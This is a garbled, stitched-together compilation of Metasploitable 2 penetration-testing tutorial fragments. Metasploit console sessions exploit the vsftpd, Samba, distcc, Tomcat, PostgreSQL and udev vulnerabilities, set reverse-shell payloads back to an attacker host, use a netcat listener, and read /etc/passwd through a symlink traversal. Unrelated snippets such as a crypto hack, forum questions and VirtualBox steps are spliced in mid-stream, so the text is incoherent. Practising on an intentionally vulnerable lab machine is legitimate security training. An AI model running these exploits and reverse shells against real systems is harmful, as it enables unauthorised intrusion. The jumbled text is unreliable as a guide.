We're not going to go into the web applications here because, in this article, we're focused on host-based exploitation.
0 Automatic
The SwapX project on BNB Chain suffered a hacking attack on February 27, 2023. SQLi and XSS on the log are possible. GET for POST is possible because only reading POSTed variables is not enforced. Metasploitable 2 is a straight-up download. For this, Metasploit has an exploit available: this module uses a documented security flaw to execute arbitrary commands on any system running distccd. RPORT 1099 yes The target port
Metasploit Pro offers automated exploits and manual exploits.
Currently missing is documentation on the web server and web application flaws as well as vulnerabilities that allow a local user to escalate to root privileges. Initially, to get the server version we will use an auxiliary module: Now we can use an appropriate exploit against the target with the information in hand: Samba username map script Command Execution.
msf exploit(tomcat_mgr_deploy) > set LHOST 192.168.127.159
S /tmp/run
Pass the udevd netlink socket PID (listed in /proc/net/netlink; it is typically the udevd PID minus 1) as argv[1]. Name Disclosure Date Rank Description
Distccd is the server of the distributed compiler for distcc. [*] Writing to socket A
According to the most recent available information, this backdoor was added to the vsftpd-2.3.4.tar.gz archive between June 30, 2011, and July 1, 2011. msf exploit(unreal_ircd_3281_backdoor) > set LHOST 192.168.127.159
msf exploit(udev_netlink) > show options
[*] Trying to mount writeable share 'tmp'
[*] Trying to link 'rootfs' to the root filesystem
[*] Now access the following share to browse the root filesystem:
msf auxiliary(samba_symlink_traversal) > exit
root@ubuntu:~# smbclient //192.168.99.131/tmp
getting file \rootfs\etc\passwd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average 317.2 KiloBytes/sec)
msf auxiliary(telnet_version) > run
[*] Auxiliary module execution completed
msf > use exploit/multi/samba/usermap_script
[*] Started reverse handler on 192.168.127.159:4444
Name Current Setting Required Description
root. This is Bypassing Authentication via SQL Injection.
Starting Nmap 6.46 (
msf > search vsftpd
We can see a few insecure web applications by navigating to the web server root, along with the msfadmin account information that we got earlier via telnet. [*] Command shell session 4 opened (192.168.127.159:8888 -> 192.168.127.154:33966) at 2021-02-06 23:51:01 +0300
Exploit target:
So we're going to connect to it using vncviewer: Connected to RFB server, using protocol version 3.3, Desktop name root's X desktop (metasploitable:0). Associated Malware: FINSPY, LATENTBOT, Dridex. I employ the following penetration testing phases: reconnaissance, threat modelling and vulnerability identification, and exploitation. msf exploit(usermap_script) > exploit
Use the showmount Command to see the export list of the NFS server. Please check out the Pentesting Lab section within our Part 1 article for further details on the setup.
0 Automatic
In order to proceed, click on the Create button. Step 6: On the left menu, click the Network button and change your network adapter settings as follows: Advanced Select: Promiscuous Mode as Allow All Attached, Network Setting: Enable Network Adapter and select Ethernet or Wireless. A demonstration of an adverse outcome. If the application is damaged by user injections and hacks, clicking the "Reset DB" button resets the application to its original state. The applications are installed in Metasploitable 2 in the /var/www directory.
[+] 192.168.127.154:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres'
daemon
whereis nc
[*] Reading from sockets
Module options (auxiliary/scanner/smb/smb_version):
Step 6: Display Database Name. I've done exploits from Kali Linux on Metasploitable 2, and I want to fix the vulnerabilities I'm exploiting, but all I can find as a solution to these vulnerabilities is using firewalls or filtering ports. After you have downloaded the Metasploitable 2 file, you will need to unzip the file to see its contents. Server version: 5.0.51a-3ubuntu5 (Ubuntu).
Here we examine Mutillidae which contains the OWASP Top Ten and more vulnerabilities.
Id Name
Let's see if we can really connect without a password to the database as root. It allows hackers to set up listeners that create a conducive environment (referred to as a Meterpreter) to manipulate compromised machines. Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres. We did an aggressive full port scan against the target. [*] Accepted the second client connection
For more information on Metasploitable 2, check out this handy guide written by HD Moore. Armitage is very user friendly. RPORT 1099 yes The target port
To transfer commands and data between processes, DRb uses remote method invocation (RMI). RHOST yes The target address
msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.127.154
In Metasploit, an exploit is available for the vsftpd version. msf exploit(distcc_exec) > set payload cmd/unix/reverse
msf exploit(java_rmi_server) > show options
msf exploit(usermap_script) > show options
Module options (exploit/unix/misc/distcc_exec):
It aids penetration testers in choosing and configuring exploits.
We again have to elevate our privileges from here.
Rapid7 Metasploit Pro installers prior to version 4.13.0-2017022101 contain a DLL preloading vulnerability, wherein it is possible for the installer to load a malicious DLL located in the current working directory of the installer. BLANK_PASSWORDS false no Try blank passwords for all users
First, from the terminal of your running Metasploitable2 VM, find its IP address. Reference: Linux IP command examples. Second, from the terminal of your Kali VM, use nmap to scan for open network services in the Metasploitable2 VM. [*] Accepted the first client connection
Our Pentesting Lab will consist of Kali Linux as the attacker and Metasploitable 2 as the target. For further details beyond what is covered within this article, please check out the Metasploitable 2 Exploitability Guide. [*] Command: echo 7Kx3j4QvoI7LOU5z;
A malicious backdoor that was introduced to the VSFTPD download archive is exploited by this module. [*] Scanned 1 of 1 hosts (100% complete)
First, open the Metasploit console and go to Applications > Exploit Tools > Armitage. Now we narrow our focus and use Metasploit to exploit the ssh vulnerabilities. In this example, the URL would be http://192.168.56.101/phpinfo.php.
[*] Automatically selected target "Linux x86"
msf exploit(distcc_exec) > exploit
Step 3: Always True Scenario.
msf exploit(vsftpd_234_backdoor) > show options
What is Metasploit? This is a tool developed by Rapid7 for the purpose of developing and executing exploits against vulnerable systems. XSS via any of the displayed fields. URI => druby://192.168.127.154:8787
[-] Exploit failed: Errno::EINVAL Invalid argument
In this series of articles we demonstrate how to discover & exploit some of the intentional vulnerabilities within the Metasploitable pentesting target. To access a particular web application, click on one of the links provided. msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.127.154
Now I just started learning about penetration testing; unfortunately now I am facing a problem. I just installed GVM / OpenVas version 21.4.1 on a VM with Kali Linux 2020.4 installed, and in the other VM I have Metasploitable2 installed. Both VM networks are set to bridged, so they can ping each other because they are on the same network. Step 2: Now extract the Metasploitable2.zip (downloaded virtual machine) into C:/Users/UserName/VirtualBox VMs/Metasploitable2. An attacker can execute arbitrary OS commands by passing a rev parameter that includes shell metacharacters to the TWikiUsers script.
Type help; or \h for help. If so please share your comments below.
[*] Auxiliary module execution completed
msf > use exploit/linux/postgres/postgres_payload
[*] Reading from sockets
root
msf > use auxiliary/admin/http/tomcat_administration
payload => cmd/unix/reverse
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead.
In this article, we'll look at how this framework within Kali Linux can be used to attack a Windows 10 machine.
This version contains a backdoor that went unnoticed for months; it is triggered by sending the letters "AB" followed by a system command to the server on any listening port. LHOST yes The listen address
Exploit target:
[*] 192.168.127.154:23 TELNET _ _ _ _ _ _ ____ \x0a _ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ \x0a| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |\x0a| | | | | | __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | | __// __/ \x0a|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|\x0a |_| \x0a\x0a\x0aWarning: Never expose this VM to an untrusted network!\x0a\x0aContact: msfdev[at]metasploit.com\x0a\x0aLogin with msfadmin/msfadmin to get started\x0a\x0a\x0ametasploitable login:
msf 5> db_nmap -sV -p 80,22,110,25 192.168.94.134. Using the UPDATE pg_largeobject binary injection method, this module compiles a Linux shared object file, uploads it to your target host, and creates a UDF (user-defined function) from that shared object. From the shell, run the ifconfig command to identify the IP address. The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. There are a number of intentionally vulnerable web applications included with Metasploitable. To access official Ubuntu documentation, please visit: Let's proceed with our exploitation.
The FTP server has since been fixed, but here is how the affected version could be exploited: In the previous section we identified that the FTP service was running on port 21, so let's try to access it via telnet: This vulnerability can also be exploited using the Metasploit framework with the VSFTPD v2.3.4 Backdoor Command Execution module. msf exploit(vsftpd_234_backdoor) > show payloads
-- ----
Exploit target:
It requires VirtualBox and additional software.
whoami
In the next tutorial we'll use metasploit to scan and detect vulnerabilities on this metasploitable VM. 0 Automatic
Step 7: Boot up the Metasploitable2 machine and log in using the default username and password: In this tutorial, we will walk through numerous ways to exploit Metasploitable 2, the popular vulnerable machine from Rapid7. msf exploit(postgres_payload) > exploit
[+] UID: uid=0(root) gid=0(root)
Nessus is a well-known and popular vulnerability scanner that is free for personal, non-commercial use; it was first released in 1998 by Renaud Deraison and is currently published by Tenable Network Security. There is also a spin-off project of Nessus 2, named OpenVAS, that is published under the GPL. Using a large number of vulnerability checks, called plugins in Nessus, you can . ---- --------------- -------- -----------
Id Name
Next, place some payload into /tmp/run because the exploit will execute that. 0 Automatic
This is Metasploitable2 (Linux). Metasploitable is an intentionally vulnerable Linux virtual machine.
This VM could be used to perform security training, evaluate security methods, and practice standard techniques for penetration testing.
RPORT 21 yes The target port
SRVPORT 8080 yes The local port to listen on. -- ----
Exploit target:
Step 4: Display Database Version. RHOST yes The target address
Metasploitable is a Linux virtual machine which we deliberately make vulnerable to attacks. Start/Stop Stop: Open services.msc.
The version range is somewhere between 3 and 4.
[*] Started reverse handler on 192.168.127.159:8888
WritableDir /tmp yes A directory where we can write files (must not be mounted noexec)
Before we perform further enumeration, let us see whether these credentials we acquired can help us in gaining access to the remote system.
RHOST => 192.168.127.154
msf auxiliary(postgres_login) > run
This is the action page. SQL injection and XSS via the username, signature and password field. Contains directories that are supposed to be private. This page gives hints about how to discover the server configuration. Cascading style sheet injection and XSS via the color field. Denial of Service if you fill up the log. XSS via the hostname, client IP, browser HTTP header, Referer HTTP header, and date fields. XSS via the user agent string HTTP header. Name Current Setting Required Description
With the udev exploit, we'll exploit the very same vulnerability, but from inside Metasploit this time:
Module options (exploit/multi/samba/usermap_script):
We're going to use netcat to connect to the attacking machine and give it a shell: Listen on port 5555 on the attacker's machine: Now that all is set up, I just make the exploit executable on the victim machine and run it: Now, for the root shell, check our local netcat listener: A little bit of work on that one, but all the more satisfying!
LPORT 4444 yes The listen port
To proceed, click the Next button. Matching Modules
The VNC service provides remote desktop access using the password password. Searching for exploits for Java provided something intriguing: Java RMI Server Insecure Default Configuration Java Code Execution.
So, as before with MySQL, it is possible to log into this database, but we have checked the available Metasploit exploits and discovered one which can further the exploitation: On some standard Linux installations of PostgreSQL, the postgres account may write to the /tmp directory and source the UDF shared libraries from there, enabling arbitrary code execution. Name Current Setting Required Description
PASSWORD no The Password for the specified username
This tutorial shows how to install it in Ubuntu Linux, how it works, and what you can do with this powerful security auditing tool.